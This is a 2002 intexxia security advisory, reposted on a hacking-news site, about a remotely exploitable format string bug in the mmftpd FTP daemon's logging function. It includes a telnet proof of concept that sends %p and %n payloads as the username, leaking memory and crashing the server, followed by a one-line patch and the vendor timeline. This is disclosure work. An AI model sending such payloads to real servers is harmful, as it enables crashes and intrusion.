Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » [CERT-intexxia] mmftpd FTP Daemon Format String Vulnerability

[CERT-intexxia] mmftpd FTP Daemon Format String Vulnerability

by Nikola Strahija on June 12th, 2002 "mmftpd is a secure FTP server that runs as a normal user, and supports virtual users only. Each user may have specific permissions, including the maximum home directory size limit and download/upload speeds. It runs on both BSD and Linux systems, and is ideal for a setup with many Web virtual host customers. It was written from scratch, with no borrowed code." The Laboratory intexxia found a remotely exploitable format string vulnerability in the mmftpd FTP deamon .


DETAILS
=======

There is a format string vulnerability in the 'mmsyslog()'
function of the 'mmftpd ' program. This function acts like 'vsyslog()'
if '__GLIBC__' is defined. It calls the 'syslog(3)' function with a
format string that can be defined by a remote user. It is not necessary
to authenticate to exploit this vulnerability.

Successful exploitation of this flaw can allow a remote user to obtain
a local account on the target machine.


________________________________________________________________________


PROOF OF CONCEPT
================

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p
331 Password required for this user
PASS foo
530 Invalid login

In the log file :
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused


________________________________________________________________________


SOLUTION
========

The following patch corrects this issue :

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun 4 11:25:03 2002
@@ -70,7 +70,7 @@
va_start(lst, fmt);
vsnprintf(buf, 1023, fmt, lst);
va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
}
}

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz


________________________________________________________________________


VENDOR STATUS
=============

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew was very reactive and confirmed the
vulnerability. He released a new version.


________________________________________________________________________


LEGALS
======

mmftpd is registered trademark.


Intexxia provides this information as a public service and "as
is". Intexxia will not be held accountable for any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This document is property of intexxia. Feel
free to use and distribute this material as long as credit is given to
intexxia and the author.


________________________________________________________________________


CONTACT
=======

CERT intexxia [email protected]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use

iQA/AwUBPQdFek2N8BNyNDXLEQKEpACgt/bLhZ6ahg8ryeQZySgsAwfgrN0AoN1t
+RZxkiJQjPqx2M/035bKlMSq
=pRJF
-----END PGP SIGNATURE-----




Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »